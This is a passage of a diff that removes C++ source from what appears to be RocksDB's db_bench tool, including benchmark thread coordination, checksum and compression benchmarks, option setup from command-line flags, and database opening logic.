-      MutexLock l(&shared->mu);
-      shared->num_initialized++;
-      if (shared->num_initialized >= shared->total) {
-        shared->cv.SignalAll();
-      }
-      while (!shared->start) {
-        shared->cv.Wait();
-      }
-    }
-
-    SetPerfLevel(static_cast<PerfLevel> (shared->perf_level));
-    thread->stats.Start(thread->tid);
-    (arg->bm->*(arg->method))(thread);
-    thread->stats.Stop();
-
-    {
-      MutexLock l(&shared->mu);
-      shared->num_done++;
-      if (shared->num_done >= shared->total) {
-        shared->cv.SignalAll();
-      }
-    }
-  }
-
-  Stats RunBenchmark(int n, Slice name,
-                     void (Benchmark::*method)(ThreadState*)) {
-    SharedState shared;
-    shared.total = n;
-    shared.num_initialized = 0;
-    shared.num_done = 0;
-    shared.start = false;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      shared.write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-    if (FLAGS_benchmark_read_rate_limit > 0) {
-      shared.read_rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_benchmark_read_rate_limit, 100000 /* refill_period_us */,
-          10 /* fairness */, RateLimiter::Mode::kReadsOnly));
-    }
-
-    std::unique_ptr<ReporterAgent> reporter_agent;
-    if (FLAGS_report_interval_seconds > 0) {
-      reporter_agent.reset(new ReporterAgent(FLAGS_env, FLAGS_report_file,
-                                             FLAGS_report_interval_seconds));
-    }
-
-    ThreadArg* arg = new ThreadArg[n];
-
-    for (int i = 0; i < n; i++) {
-#ifdef NUMA
-      if (FLAGS_enable_numa) {
-        // Performs a local allocation of memory to threads in numa node.
-        int n_nodes = numa_num_task_nodes();  // Number of nodes in NUMA.
-        numa_exit_on_error = 1;
-        int numa_node = i % n_nodes;
-        bitmask* nodes = numa_allocate_nodemask();
-        numa_bitmask_clearall(nodes);
-        numa_bitmask_setbit(nodes, numa_node);
-        // numa_bind() call binds the process to the node and these
-        // properties are passed on to the thread that is created in
-        // StartThread method called later in the loop.
-        numa_bind(nodes);
-        numa_set_strict(1);
-        numa_free_nodemask(nodes);
-      }
-#endif
-      arg[i].bm = this;
-      arg[i].method = method;
-      arg[i].shared = &shared;
-      arg[i].thread = new ThreadState(i);
-      arg[i].thread->stats.SetReporterAgent(reporter_agent.get());
-      arg[i].thread->shared = &shared;
-      FLAGS_env->StartThread(ThreadBody, &arg[i]);
-    }
-
-    shared.mu.Lock();
-    while (shared.num_initialized < n) {
-      shared.cv.Wait();
-    }
-
-    shared.start = true;
-    shared.cv.SignalAll();
-    while (shared.num_done < n) {
-      shared.cv.Wait();
-    }
-    shared.mu.Unlock();
-
-    // Stats for some threads can be excluded.
-    Stats merge_stats;
-    for (int i = 0; i < n; i++) {
-      merge_stats.Merge(arg[i].thread->stats);
-    }
-    merge_stats.Report(name);
-
-    for (int i = 0; i < n; i++) {
-      delete arg[i].thread;
-    }
-    delete[] arg;
-
-    return merge_stats;
-  }
-
-  void Crc32c(ThreadState* thread) {
-    // Checksum about 500MB of data total
-    const int size = 4096;
-    const char* label = "(4K per op)";
-    std::string data(size, 'x');
-    int64_t bytes = 0;
-    uint32_t crc = 0;
-    while (bytes < 500 * 1048576) {
-      crc = crc32c::Value(data.data(), size);
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kCrc);
-      bytes += size;
-    }
-    // Print so result is not dead
-    fprintf(stderr, "... crc=0x%x\r", static_cast<unsigned int>(crc));
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(label);
-  }
-
-  void xxHash(ThreadState* thread) {
-    // Checksum about 500MB of data total
-    const int size = 4096;
-    const char* label = "(4K per op)";
-    std::string data(size, 'x');
-    int64_t bytes = 0;
-    unsigned int xxh32 = 0;
-    while (bytes < 500 * 1048576) {
-      xxh32 = XXH32(data.data(), size, 0);
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kHash);
-      bytes += size;
-    }
-    // Print so result is not dead
-    fprintf(stderr, "... xxh32=0x%x\r", static_cast<unsigned int>(xxh32));
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(label);
-  }
-
-  void AcquireLoad(ThreadState* thread) {
-    int dummy;
-    std::atomic<void*> ap(&dummy);
-    int count = 0;
-    void *ptr = nullptr;
-    thread->stats.AddMessage("(each op is 1000 loads)");
-    while (count < 100000) {
-      for (int i = 0; i < 1000; i++) {
-        ptr = ap.load(std::memory_order_acquire);
-      }
-      count++;
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kOthers);
-    }
-    if (ptr == nullptr) exit(1);  // Disable unused variable warning.
-  }
-
-  void Compress(ThreadState *thread) {
-    RandomGenerator gen;
-    Slice input = gen.Generate(FLAGS_block_size);
-    int64_t bytes = 0;
-    int64_t produced = 0;
-    bool ok = true;
-    std::string compressed;
-
-    // Compress 1G
-    while (ok && bytes < int64_t(1) << 30) {
-      compressed.clear();
-      ok = CompressSlice(input, &compressed);
-      produced += compressed.size();
-      bytes += input.size();
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kCompress);
-    }
-
-    if (!ok) {
-      thread->stats.AddMessage("(compression failure)");
-    } else {
-      char buf[340];
-      snprintf(buf, sizeof(buf), "(output: %.1f%%)",
-               (produced * 100.0) / bytes);
-      thread->stats.AddMessage(buf);
-      thread->stats.AddBytes(bytes);
-    }
-  }
-
-  void Uncompress(ThreadState *thread) {
-    RandomGenerator gen;
-    Slice input = gen.Generate(FLAGS_block_size);
-    std::string compressed;
-
-    bool ok = CompressSlice(input, &compressed);
-    int64_t bytes = 0;
-    int decompress_size;
-    while (ok && bytes < 1024 * 1048576) {
-      char *uncompressed = nullptr;
-      switch (FLAGS_compression_type_e) {
-        case rocksdb::kSnappyCompression: {
-          // get size and allocate here to make comparison fair
-          size_t ulength = 0;
-          if (!Snappy_GetUncompressedLength(compressed.data(),
-                                            compressed.size(), &ulength)) {
-            ok = false;
-            break;
-          }
-          uncompressed = new char[ulength];
-          ok = Snappy_Uncompress(compressed.data(), compressed.size(),
-                                 uncompressed);
-          break;
-        }
-      case rocksdb::kZlibCompression:
-        uncompressed = Zlib_Uncompress(compressed.data(), compressed.size(),
-                                       &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kBZip2Compression:
-        uncompressed = BZip2_Uncompress(compressed.data(), compressed.size(),
-                                        &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kLZ4Compression:
-        uncompressed = LZ4_Uncompress(compressed.data(), compressed.size(),
-                                      &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kLZ4HCCompression:
-        uncompressed = LZ4_Uncompress(compressed.data(), compressed.size(),
-                                      &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kXpressCompression:
-        uncompressed = XPRESS_Uncompress(compressed.data(), compressed.size(),
-          &decompress_size);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kZSTD:
-        uncompressed = ZSTD_Uncompress(compressed.data(), compressed.size(),
-                                       &decompress_size);
-        ok = uncompressed != nullptr;
-        break;
-      default:
-        ok = false;
-      }
-      delete[] uncompressed;
-      bytes += input.size();
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kUncompress);
-    }
-
-    if (!ok) {
-      thread->stats.AddMessage("(compression failure)");
-    } else {
-      thread->stats.AddBytes(bytes);
-    }
-  }
-
-  // Returns true if the options is initialized from the specified
-  // options file.
-  bool InitializeOptionsFromFile(Options* opts) {
-#ifndef ROCKSDB_LITE
-    printf("Initializing RocksDB Options from the specified file\n");
-    DBOptions db_opts;
-    std::vector<ColumnFamilyDescriptor> cf_descs;
-    if (FLAGS_options_file != "") {
-      auto s = LoadOptionsFromFile(FLAGS_options_file, Env::Default(), &db_opts,
-                                   &cf_descs);
-      if (s.ok()) {
-        *opts = Options(db_opts, cf_descs[0].options);
-        return true;
-      }
-      fprintf(stderr, "Unable to load options file %s --- %s\n",
-              FLAGS_options_file.c_str(), s.ToString().c_str());
-      exit(1);
-    }
-#endif
-    return false;
-  }
-
-  void InitializeOptionsFromFlags(Options* opts) {
-    printf("Initializing RocksDB Options from command-line flags\n");
-    Options& options = *opts;
-
-    assert(db_.db == nullptr);
-
-    options.max_open_files = FLAGS_open_files;
-    if (FLAGS_cost_write_buffer_to_cache || FLAGS_db_write_buffer_size != 0) {
-      options.write_buffer_manager.reset(
-          new WriteBufferManager(FLAGS_db_write_buffer_size, cache_));
-    }
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-    options.max_write_buffer_number_to_maintain =
-        FLAGS_max_write_buffer_number_to_maintain;
-    options.max_background_jobs = FLAGS_max_background_jobs;
-    options.max_background_compactions = FLAGS_max_background_compactions;
-    options.max_subcompactions = static_cast<uint32_t>(FLAGS_subcompactions);
-    options.max_background_flushes = FLAGS_max_background_flushes;
-    options.compaction_style = FLAGS_compaction_style_e;
-    options.compaction_pri = FLAGS_compaction_pri_e;
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    options.allow_mmap_writes = FLAGS_mmap_write;
-    options.use_direct_reads = FLAGS_use_direct_reads;
-    options.use_direct_io_for_flush_and_compaction =
-        FLAGS_use_direct_io_for_flush_and_compaction;
-#ifndef ROCKSDB_LITE
-    options.compaction_options_fifo = CompactionOptionsFIFO(
-        FLAGS_fifo_compaction_max_table_files_size_mb * 1024 * 1024,
-        FLAGS_fifo_compaction_allow_compaction, FLAGS_fifo_compaction_ttl);
-#endif  // ROCKSDB_LITE
-    if (FLAGS_prefix_size != 0) {
-      options.prefix_extractor.reset(
-          NewFixedPrefixTransform(FLAGS_prefix_size));
-    }
-    if (FLAGS_use_uint64_comparator) {
-      options.comparator = test::Uint64Comparator();
-      if (FLAGS_key_size != 8) {
-        fprintf(stderr, "Using Uint64 comparator but key size is not 8.\n");
-        exit(1);
-      }
-    }
-    if (FLAGS_use_stderr_info_logger) {
-      options.info_log.reset(new StderrLogger());
-    }
-    options.memtable_huge_page_size = FLAGS_memtable_use_huge_page ? 2048 : 0;
-    options.memtable_prefix_bloom_size_ratio = FLAGS_memtable_bloom_size_ratio;
-    if (FLAGS_memtable_insert_with_hint_prefix_size > 0) {
-      options.memtable_insert_with_hint_prefix_extractor.reset(
-          NewCappedPrefixTransform(
-              FLAGS_memtable_insert_with_hint_prefix_size));
-    }
-    options.bloom_locality = FLAGS_bloom_locality;
-    options.max_file_opening_threads = FLAGS_file_opening_threads;
-    options.new_table_reader_for_compaction_inputs =
-        FLAGS_new_table_reader_for_compaction_inputs;
-    options.compaction_readahead_size = FLAGS_compaction_readahead_size;
-    options.random_access_max_buffer_size = FLAGS_random_access_max_buffer_size;
-    options.writable_file_max_buffer_size = FLAGS_writable_file_max_buffer_size;
-    options.use_fsync = FLAGS_use_fsync;
-    options.num_levels = FLAGS_num_levels;
-    options.target_file_size_base = FLAGS_target_file_size_base;
-    options.target_file_size_multiplier = FLAGS_target_file_size_multiplier;
-    options.max_bytes_for_level_base = FLAGS_max_bytes_for_level_base;
-    options.level_compaction_dynamic_level_bytes =
-        FLAGS_level_compaction_dynamic_level_bytes;
-    options.max_bytes_for_level_multiplier =
-        FLAGS_max_bytes_for_level_multiplier;
-    if ((FLAGS_prefix_size == 0) && (FLAGS_rep_factory == kPrefixHash ||
-                                     FLAGS_rep_factory == kHashLinkedList)) {
-      fprintf(stderr, "prefix_size should be non-zero if PrefixHash or "
-                      "HashLinkedList memtablerep is used\n");
-      exit(1);
-    }
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        options.memtable_factory.reset(new SkipListFactory(
-            FLAGS_skip_list_lookahead));
-        break;
-#ifndef ROCKSDB_LITE
-      case kPrefixHash:
-        options.memtable_factory.reset(
-            NewHashSkipListRepFactory(FLAGS_hash_bucket_count));
-        break;
-      case kHashLinkedList:
-        options.memtable_factory.reset(NewHashLinkListRepFactory(
-            FLAGS_hash_bucket_count));
-        break;
-      case kVectorRep:
-        options.memtable_factory.reset(
-          new VectorRepFactory
-        );
-        break;
-      case kCuckoo:
-        options.memtable_factory.reset(NewHashCuckooRepFactory(
-            options.write_buffer_size, FLAGS_key_size + FLAGS_value_size));
-        break;
-#else
-      default:
-        fprintf(stderr, "Only skip list is supported in lite mode\n");
-        exit(1);
-#endif  // ROCKSDB_LITE
-    }
-    if (FLAGS_use_plain_table) {
-#ifndef ROCKSDB_LITE
-      if (FLAGS_rep_factory != kPrefixHash &&
-          FLAGS_rep_factory != kHashLinkedList) {
-        fprintf(stderr, "Waring: plain table is used with skipList\n");
-      }
-
-      int bloom_bits_per_key = FLAGS_bloom_bits;
-      if (bloom_bits_per_key < 0) {
-        bloom_bits_per_key = 0;
-      }
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = FLAGS_key_size;
-      plain_table_options.bloom_bits_per_key = bloom_bits_per_key;
-      plain_table_options.hash_table_ratio = 0.75;
-      options.table_factory = std::shared_ptr<TableFactory>(
-          NewPlainTableFactory(plain_table_options));
-#else
-      fprintf(stderr, "Plain table is not supported in lite mode\n");
-      exit(1);
-#endif  // ROCKSDB_LITE
-    } else if (FLAGS_use_cuckoo_table) {
-#ifndef ROCKSDB_LITE
-      if (FLAGS_cuckoo_hash_ratio > 1 || FLAGS_cuckoo_hash_ratio < 0) {
-        fprintf(stderr, "Invalid cuckoo_hash_ratio\n");
-        exit(1);
-      }
-      rocksdb::CuckooTableOptions table_options;
-      table_options.hash_table_ratio = FLAGS_cuckoo_hash_ratio;
-      table_options.identity_as_first_hash = FLAGS_identity_as_first_hash;
-      options.table_factory = std::shared_ptr<TableFactory>(
-          NewCuckooTableFactory(table_options));
-#else
-      fprintf(stderr, "Cuckoo table is not supported in lite mode\n");
-      exit(1);
-#endif  // ROCKSDB_LITE
-    } else {
-      BlockBasedTableOptions block_based_options;
-      if (FLAGS_use_hash_search) {
-        if (FLAGS_prefix_size == 0) {
-          fprintf(stderr,
-              "prefix_size not assigned when enable use_hash_search \n");
-          exit(1);
-        }
-        block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-      } else {
-        block_based_options.index_type = BlockBasedTableOptions::kBinarySearch;
-      }
-      if (FLAGS_partition_index_and_filters) {
-        if (FLAGS_use_hash_search) {
-          fprintf(stderr,
-                  "use_hash_search is incompatible with "
-                  "partition_index_and_filters and is ignored");
-        }
-        block_based_options.index_type =
-            BlockBasedTableOptions::kTwoLevelIndexSearch;
-        block_based_options.partition_filters = true;
-        block_based_options.metadata_block_size = FLAGS_metadata_block_size;
-      }
-      if (cache_ == nullptr) {
-        block_based_options.no_block_cache = true;
-      }
-      block_based_options.cache_index_and_filter_blocks =
-          FLAGS_cache_index_and_filter_blocks;
-      block_based_options.pin_l0_filter_and_index_blocks_in_cache =
-          FLAGS_pin_l0_filter_and_index_blocks_in_cache;
-      if (FLAGS_cache_high_pri_pool_ratio > 1e-6) {  // > 0.0 + eps
-        block_based_options.cache_index_and_filter_blocks_with_high_priority =
-            true;
-      }
-      block_based_options.block_cache = cache_;
-      block_based_options.block_cache_compressed = compressed_cache_;
-      block_based_options.block_size = FLAGS_block_size;
-      block_based_options.block_restart_interval = FLAGS_block_restart_interval;
-      block_based_options.index_block_restart_interval =
-          FLAGS_index_block_restart_interval;
-      block_based_options.filter_policy = filter_policy_;
-      block_based_options.format_version = 2;
-      block_based_options.read_amp_bytes_per_bit = FLAGS_read_amp_bytes_per_bit;
-      if (FLAGS_read_cache_path != "") {
-#ifndef ROCKSDB_LITE
-        Status rc_status;
-
-        // Read cache need to be provided with a the Logger, we will put all
-        // reac cache logs in the read cache path in a file named rc_LOG
-        rc_status = FLAGS_env->CreateDirIfMissing(FLAGS_read_cache_path);
-        std::shared_ptr<Logger> read_cache_logger;
-        if (rc_status.ok()) {
-          rc_status = FLAGS_env->NewLogger(FLAGS_read_cache_path + "/rc_LOG",
-                                           &read_cache_logger);
-        }
-
-        if (rc_status.ok()) {
-          PersistentCacheConfig rc_cfg(FLAGS_env, FLAGS_read_cache_path,
-                                       FLAGS_read_cache_size,
-                                       read_cache_logger);
-
-          rc_cfg.enable_direct_reads = FLAGS_read_cache_direct_read;
-          rc_cfg.enable_direct_writes = FLAGS_read_cache_direct_write;
-          rc_cfg.writer_qdepth = 4;
-          rc_cfg.writer_dispatch_size = 4 * 1024;
-
-          auto pcache = std::make_shared<BlockCacheTier>(rc_cfg);
-          block_based_options.persistent_cache = pcache;
-          rc_status = pcache->Open();
-        }
-
-        if (!rc_status.ok()) {
-          fprintf(stderr, "Error initializing read cache, %s\n",
-                  rc_status.ToString().c_str());
-          exit(1);
-        }
-#else
-        fprintf(stderr, "Read cache is not supported in LITE\n");
-        exit(1);
-
-#endif
-      }
-      options.table_factory.reset(
-          NewBlockBasedTableFactory(block_based_options));
-    }
-    if (FLAGS_max_bytes_for_level_multiplier_additional_v.size() > 0) {
-      if (FLAGS_max_bytes_for_level_multiplier_additional_v.size() !=
-          (unsigned int)FLAGS_num_levels) {
-        fprintf(stderr, "Insufficient number of fanouts specified %d\n",
-                (int)FLAGS_max_bytes_for_level_multiplier_additional_v.size());
-        exit(1);
-      }
-      options.max_bytes_for_level_multiplier_additional =
-        FLAGS_max_bytes_for_level_multiplier_additional_v;
-    }
-    options.level0_stop_writes_trigger = FLAGS_level0_stop_writes_trigger;
-    options.level0_file_num_compaction_trigger =
-        FLAGS_level0_file_num_compaction_trigger;
-    options.level0_slowdown_writes_trigger =
-      FLAGS_level0_slowdown_writes_trigger;
-    options.compression = FLAGS_compression_type_e;
-    options.compression_opts.level = FLAGS_compression_level;
-    options.compression_opts.max_dict_bytes = FLAGS_compression_max_dict_bytes;
-    options.WAL_ttl_seconds = FLAGS_wal_ttl_seconds;
-    options.WAL_size_limit_MB = FLAGS_wal_size_limit_MB;
-    options.max_total_wal_size = FLAGS_max_total_wal_size;
-
-    if (FLAGS_min_level_to_compress >= 0) {
-      assert(FLAGS_min_level_to_compress <= FLAGS_num_levels);
-      options.compression_per_level.resize(FLAGS_num_levels);
-      for (int i = 0; i < FLAGS_min_level_to_compress; i++) {
-        options.compression_per_level[i] = kNoCompression;
-      }
-      for (int i = FLAGS_min_level_to_compress;
-           i < FLAGS_num_levels; i++) {
-        options.compression_per_level[i] = FLAGS_compression_type_e;
-      }
-    }
-    options.soft_rate_limit = FLAGS_soft_rate_limit;
-    options.hard_rate_limit = FLAGS_hard_rate_limit;
-    options.soft_pending_compaction_bytes_limit =
-        FLAGS_soft_pending_compaction_bytes_limit;
-    options.hard_pending_compaction_bytes_limit =
-        FLAGS_hard_pending_compaction_bytes_limit;
-    options.delayed_write_rate = FLAGS_delayed_write_rate;
-    options.allow_concurrent_memtable_write =
-        FLAGS_allow_concurrent_memtable_write;
-    options.enable_write_thread_adaptive_yield =
-        FLAGS_enable_write_thread_adaptive_yield;
-    options.enable_pipelined_write = FLAGS_enable_pipelined_write;
-    options.write_thread_max_yield_usec = FLAGS_write_thread_max_yield_usec;
-    options.write_thread_slow_yield_usec = FLAGS_write_thread_slow_yield_usec;
-    options.rate_limit_delay_max_milliseconds =
-      FLAGS_rate_limit_delay_max_milliseconds;
-    options.table_cache_numshardbits = FLAGS_table_cache_numshardbits;
-    options.max_compaction_bytes = FLAGS_max_compaction_bytes;
-    options.disable_auto_compactions = FLAGS_disable_auto_compactions;
-    options.optimize_filters_for_hits = FLAGS_optimize_filters_for_hits;
-
-    // fill storage options
-    options.advise_random_on_open = FLAGS_advise_random_on_open;
-    options.access_hint_on_compaction_start = FLAGS_compaction_fadvice_e;
-    options.use_adaptive_mutex = FLAGS_use_adaptive_mutex;
-    options.bytes_per_sync = FLAGS_bytes_per_sync;
-    options.wal_bytes_per_sync = FLAGS_wal_bytes_per_sync;
-
-    // merge operator options
-    options.merge_operator = MergeOperators::CreateFromStringId(
-        FLAGS_merge_operator);
-    if (options.merge_operator == nullptr && !FLAGS_merge_operator.empty()) {
-      fprintf(stderr, "invalid merge operator: %s\n",
-              FLAGS_merge_operator.c_str());
-      exit(1);
-    }
-    options.max_successive_merges = FLAGS_max_successive_merges;
-    options.report_bg_io_stats = FLAGS_report_bg_io_stats;
-
-    // set universal style compaction configurations, if applicable
-    if (FLAGS_universal_size_ratio != 0) {
-      options.compaction_options_universal.size_ratio =
-        FLAGS_universal_size_ratio;
-    }
-    if (FLAGS_universal_min_merge_width != 0) {
-      options.compaction_options_universal.min_merge_width =
-        FLAGS_universal_min_merge_width;
-    }
-    if (FLAGS_universal_max_merge_width != 0) {
-      options.compaction_options_universal.max_merge_width =
-        FLAGS_universal_max_merge_width;
-    }
-    if (FLAGS_universal_max_size_amplification_percent != 0) {
-      options.compaction_options_universal.max_size_amplification_percent =
-        FLAGS_universal_max_size_amplification_percent;
-    }
-    if (FLAGS_universal_compression_size_percent != -1) {
-      options.compaction_options_universal.compression_size_percent =
-        FLAGS_universal_compression_size_percent;
-    }
-    options.compaction_options_universal.allow_trivial_move =
-        FLAGS_universal_allow_trivial_move;
-    if (FLAGS_thread_status_per_interval > 0) {
-      options.enable_thread_tracking = true;
-    }
-    if (FLAGS_rate_limiter_bytes_per_sec > 0) {
-      if (FLAGS_rate_limit_bg_reads &&
-          !FLAGS_new_table_reader_for_compaction_inputs) {
-        fprintf(stderr,
-                "rate limit compaction reads must have "
-                "new_table_reader_for_compaction_inputs set\n");
-        exit(1);
-      }
-      options.rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_rate_limiter_bytes_per_sec, 100 * 1000 /* refill_period_us */,
-          10 /* fairness */,
-          FLAGS_rate_limit_bg_reads ? RateLimiter::Mode::kReadsOnly
-                                    : RateLimiter::Mode::kWritesOnly));
-    }
-
-#ifndef ROCKSDB_LITE
-    if (FLAGS_readonly && FLAGS_transaction_db) {
-      fprintf(stderr, "Cannot use readonly flag with transaction_db\n");
-      exit(1);
-    }
-#endif  // ROCKSDB_LITE
-
-  }
-
-  void InitializeOptionsGeneral(Options* opts) {
-    Options& options = *opts;
-
-    options.create_missing_column_families = FLAGS_num_column_families > 1;
-    options.statistics = dbstats;
-    options.wal_dir = FLAGS_wal_dir;
-    options.create_if_missing = !FLAGS_use_existing_db;
-    options.dump_malloc_stats = FLAGS_dump_malloc_stats;
-
-    if (FLAGS_row_cache_size) {
-      if (FLAGS_cache_numshardbits >= 1) {
-        options.row_cache =
-            NewLRUCache(FLAGS_row_cache_size, FLAGS_cache_numshardbits);
-      } else {
-        options.row_cache = NewLRUCache(FLAGS_row_cache_size);
-      }
-    }
-    if (FLAGS_enable_io_prio) {
-      FLAGS_env->LowerThreadPoolIOPriority(Env::LOW);
-      FLAGS_env->LowerThreadPoolIOPriority(Env::HIGH);
-    }
-    options.env = FLAGS_env;
-
-    if (FLAGS_num_multi_db <= 1) {
-      OpenDb(options, FLAGS_db, &db_);
-    } else {
-      multi_dbs_.clear();
-      multi_dbs_.resize(FLAGS_num_multi_db);
-      auto wal_dir = options.wal_dir;
-      for (int i = 0; i < FLAGS_num_multi_db; i++) {
-        if (!wal_dir.empty()) {
-          options.wal_dir = GetPathForMultiple(wal_dir, i);
-        }
-        OpenDb(options, GetPathForMultiple(FLAGS_db, i), &multi_dbs_[i]);
-      }
-      options.wal_dir = wal_dir;
-    }
-  }
-
-  void Open(Options* opts) {
-    if (!InitializeOptionsFromFile(opts)) {
-      InitializeOptionsFromFlags(opts);
-    }
-
-    InitializeOptionsGeneral(opts);
-  }
-
-  void OpenDb(Options options, const std::string& db_name,
-      DBWithColumnFamilies* db) {
-    Status s;
-    // Open with column families if necessary.
-    if (FLAGS_num_column_families > 1) {
-      size_t num_hot = FLAGS_num_column_families;
-      if (FLAGS_num_hot_column_families > 0 &&
-          FLAGS_num_hot_column_families < FLAGS_num_column_families) {
-        num_hot = FLAGS_num_hot_column_families;
-      } else {
-        FLAGS_num_hot_column_families = FLAGS_num_column_families;
-      }
-      std::vector<ColumnFamilyDescriptor> column_families;
-      for (size_t i = 0; i < num_hot; i++) {
-        column_families.push_back(ColumnFamilyDescriptor(
-              ColumnFamilyName(i), ColumnFamilyOptions(options)));
-      }
-      std::vector<int> cfh_idx_to_prob;
-      if (!FLAGS_column_family_distribution.empty()) {
-        std::stringstream cf_prob_stream(FLAGS_column_family_distribution);
-        std::string cf_prob;
-        int sum = 0;
-        while (std::getline(cf_prob_stream, cf_prob, ',')) {
-          cfh_idx_to_prob.push_back(std::stoi(cf_prob));
-          sum += cfh_idx_to_prob.back();
-        }
-        if (sum != 100) {
-          fprintf(stderr, "column_family_distribution items must sum to 100\n");
-          exit(1);
-        }
-        if (cfh_idx_to_prob.size() != num_hot) {
-          fprintf(stderr,
-                  "got %" ROCKSDB_PRIszt
-                  " column_family_distribution items; expected "
-                  "%" ROCKSDB_PRIszt "\n",
-                  cfh_idx_to_prob.size(), num_hot);
-          exit(1);
-        }
-      }
-#ifndef ROCKSDB_LITE
-      if (FLAGS_readonly) {
-        s = DB::OpenForReadOnly(options, db_name, column_families,
-            &db->cfh, &db->db);
-      } else if (FLAGS_optimistic_transaction_db) {
-        s = OptimisticTransactionDB::Open(options, db_name, column_families,
-                                          &db->cfh, &db->opt_txn_db);
-        if (s.ok()) {
-          db->db = db->opt_txn_db->GetBaseDB();
-        }
-      } else if (FLAGS_transaction_db) {
-        TransactionDB* ptr;
-        TransactionDBOptions txn_db_options;
-        s = TransactionDB::Open(options, txn_db_options, db_name,
-                                column_families, &db->cfh, &ptr);
-        if (s.ok()) {
-          db->db = ptr;
-        }
-      } else {
-        s = DB::Open(options, db_name, column_families, &db->cfh, &db->db);
-      }
-#else
-      s = DB::Open(options, db_name, column_families, &db->cfh, &db->db);
-#endif  // ROCKSDB_LITE
-      db->cfh.resize(FLAGS_num_column_families);
-      db->num_created = num_hot;
-      db->num_hot = num_hot;
-      db->cfh_idx_to_prob = std::move(cfh_idx_to_prob);
-#ifndef ROCKSDB_LITE
-    } else if (FLAGS_readonly) {
-      s = DB::OpenForReadOnly(options, db_name, &db->db);
-    } else if (FLAGS_optimistic_transaction_db) {
-      s = OptimisticTransactionDB::Open(options, db_name, &db->opt_txn_db);
-      if (s.ok()) {
-        db->db = db->opt_txn_db->GetBaseDB();
-      }
-    } else if (FLAGS_transaction_db) {
-      TransactionDB* ptr;
-      TransactionDBOptions txn_db_options;
-      s = CreateLoggerFromOptions(db_name, options, &options.info_log);
-      if (s.ok()) {
-        s = TransactionDB::Open(options, txn_db_options, db_name, &ptr);
-      }
-      if (s.ok()) {
-        db->db = ptr;
-      }
-    } else if (FLAGS_use_blob_db) {
-      blob_db::BlobDBOptions blob_db_options;
-      blob_db::BlobDB* ptr;
-      s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr);
-      if (s.ok()) {
-        db->db = ptr;
-      }
-#endif  // ROCKSDB_LITE
-    } else {
-      s = DB::Open(options, db_name, &db->db);
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  enum WriteMode {
-    RANDOM, SEQUENTIAL, UNIQUE_RANDOM
-  };
-
-  void WriteSeqDeterministic(ThreadState* thread) {
-    DoDeterministicCompact(thread, open_options_.compaction_style, SEQUENTIAL);
-  }
-
-  void WriteUniqueRandomDeterministic(ThreadState* thread) {
-    DoDeterministicCompact(thread, open_options_.compaction_style,
-                           UNIQUE_RANDOM);
-  }
-
-  void WriteSeq(ThreadState* thread) {
-    DoWrite(thread, SEQUENTIAL);
-  }
-
-  void WriteRandom(ThreadState* thread) {
-    DoWrite(thread, RANDOM);
-  }
-
-  void WriteUniqueRandom(ThreadState* thread) {
-    DoWrite(thread, UNIQUE_RANDOM);
-  }
-
-  class KeyGenerator {
-   public:
-    KeyGenerator(Random64* rand, WriteMode mode,
-        uint64_t num, uint64_t num_per_set = 64 * 1024)
-      : rand_(rand),
-        mode_(mode),
-        num_(num),
-        next_(0) {
-      if (mode_ == UNIQUE_RANDOM) {
-        // NOTE: if memory consumption of this approach becomes a concern,
-        // we can either break it into pieces and only random shuffle a section
-        // each time. Alternatively, use a bit map implementation
-        // (https://reviews.facebook.net/differential/diff/54627/)
-        values_.resize(num_);
-        for (uint64_t i = 0; i < num_; ++i) {
-          values_[i] = i;
-        }
-        std::shuffle(
-            values_.begin(), values_.end(),
-            std::default_random_engine(static_cast<unsigned int>(FLAGS_seed)));
-      }
-    }
-
-    uint64_t Next() {
-      switch (mode_) {
-        case SEQUENTIAL:
-          return next_++;
-        case RANDOM:
-          return rand_->Next() % num_;
-        case UNIQUE_RANDOM:
-          assert(next_ + 1 < num_);
-          return values_[next_++];
-      }
-      assert(false);
-      return std::numeric_limits<uint64_t>::max();
-    }
-
-   private:
-    Random64* rand_;
-    WriteMode mode_;
-    const uint64_t num_;
-    uint64_t next_;
-    std::vector<uint64_t> values_;
-  };
-
-  DB* SelectDB(ThreadState* thread) {
-    return SelectDBWithCfh(thread)->db;
-  }
-
-  DBWithColumnFamilies* SelectDBWithCfh(ThreadState* thread) {
-    return SelectDBWithCfh(thread->rand.Next());
-  }
-
-  DBWithColumnFamilies* SelectDBWithCfh(uint64_t rand_int) {
-    if (db_.db != nullptr) {
-      return &db_;
-    } else  {
-      return &multi_dbs_[rand_int % multi_dbs_.size()];
-    }
-  }
-
-  void DoWrite(ThreadState* thread, WriteMode write_mode) {
-    const int test_duration = write_mode == RANDOM ? FLAGS_duration : 0;
-    const int64_t num_ops = writes_ == 0 ? num_ : writes_;
-
-    size_t num_key_gens = 1;
-    if (db_.db == nullptr) {
-      num_key_gens = multi_dbs_.size();
-    }
-    std::vector<std::unique_ptr<KeyGenerator>> key_gens(num_key_gens);
-    int64_t max_ops = num_ops * num_key_gens;
